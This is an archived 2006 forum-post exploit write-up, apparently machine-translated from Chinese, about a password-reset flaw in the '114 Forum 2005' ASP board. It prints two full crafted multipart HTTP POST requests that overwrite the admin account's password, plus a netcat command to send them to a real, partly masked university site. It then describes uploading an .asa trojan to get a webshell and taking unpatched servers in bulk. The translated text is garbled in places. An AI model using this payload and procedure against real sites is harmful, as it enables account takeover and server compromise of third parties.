1 1 4 Forum 2 0 0 5 The official version of the vulnerability-vulnerability warning-the black bar safety net

2006-03-03T00:00:00
ID MYHACK58:6220067582
Type myhack58
Reporter 佚名
Modified 2006-03-03T00:00:00

Description

Article author: withered Ling rose Information source: evil octal information security teamwww.eviloctal.com to

Keywords: "ALL RIGHTS RESERVED design and production: Web 1 1 4"

Vulnerability description: Site 1 1 4 Forum 2 0 0 5 version of the official /edituserdb. asp To submit data and cooikes lack of validation Cause any user can modify the administrator password The default background admin/index. asp

Today on a side note one of the room of the machine with a bit. <http://www.***. net. cn/xzl/BBS/index. asp>

**Medical University website on a forum. Register a user 3 3 2 2 1. Then jump to the /edituserdb. asp,click“Modify registration”to start the capture! Use Notepad to save the capture as follows: -----------------------------------------------------------------------------------------------------------

POST /xzl/BBS//SaveUser_Account. asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, application/x-shockwave-flash, / Referer: <http://www.***. net. cn/xzl/BBS//edituserdb. asp> Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon) Host: www.***. net. cn Content-Length: 2 3 0 4 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtUserCode"

3 3 2 2 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtPassword"

3 3 2 2 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtConfirmPassword"

3 3 2 2 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtQuestion"

3 3 2 2 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtAnswer"

3 3 2 2 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtUserName"

3 3 2 2 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="selSex"

Mr. -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtNick"

1 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtProvince"

1 1 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtAddress"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtPostCode"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtTel"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtMobile"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtFax"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtEmail"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtUrl"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtfile"; filename="" Content-Type: application/octet-stream

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtOicq"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtDocument"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="submit"

Modify the registration information -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtId"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtTempId"

-----------------------------7d61e41d605f6--

------------------------------------------------------------------------------------------------------------

Where:“ -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtUserCode"

3 3 2 2 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtPassword"

3 3 2 2 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtConfirmPassword"

3 3 2 2 1 -----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtQuestion"

3 3 2 2 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtAnswer"

3 3 2 2 1 -----------------------------7d61e41d605f6 ”

Modify the first"3 3 2 2 1"“admin”save 1 1. txt text:

POST /xzl/BBS//SaveUser_Account. asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, application/x-shockwave-flash, / Referer: <http://www.***. net. cn/xzl/BBS//edituserdb. asp> Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon) Host: www.***. net. cn Content-Length: 2 3 0 4 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtUserCode"

admin -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtPassword"

3 3 2 2 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtConfirmPassword"

3 3 2 2 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtQuestion"

3 3 2 2 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtAnswer"

3 3 2 2 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtUserName"

3 3 2 2 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="selSex"

Mr. -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtNick"

1 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtProvince"

1 1 1 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtAddress"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtPostCode"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtTel"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtMobile"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtFax"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtEmail"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtUrl"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtfile"; filename="" Content-Type: application/octet-stream

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtOicq"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtDocument"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="submit"

Modify the registration information -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtId"

-----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtTempId"

-----------------------------7d61e41d605f6--

Here because I registered a user name 3 3 2 2 1 with admin Length One to, so here need not modify the byte length. And then by nc submitted to the server nc www.***. net. cn 8 0 <11.txt Returns the prompt to modify the membership information successfully. Then use the admin password for the application 3 3 2 2 1 The password to log in. Of course, is the administrator privileges, and then login the backend, click on“modify column”, and upload the asa Trojans, ok,get to the webshll it. Looked, this forum system is not a patch, you can take the batch of webshell, but I as long as to me the more useful one server, the other did not go to catch up. There is not clear, you can see the animation,<http://www.ncph.net/soft/114>论坛 最新 漏洞 利用 动画 .rar Garbage vulnerabilities, here is get to the rookie to see, high don't yell at me.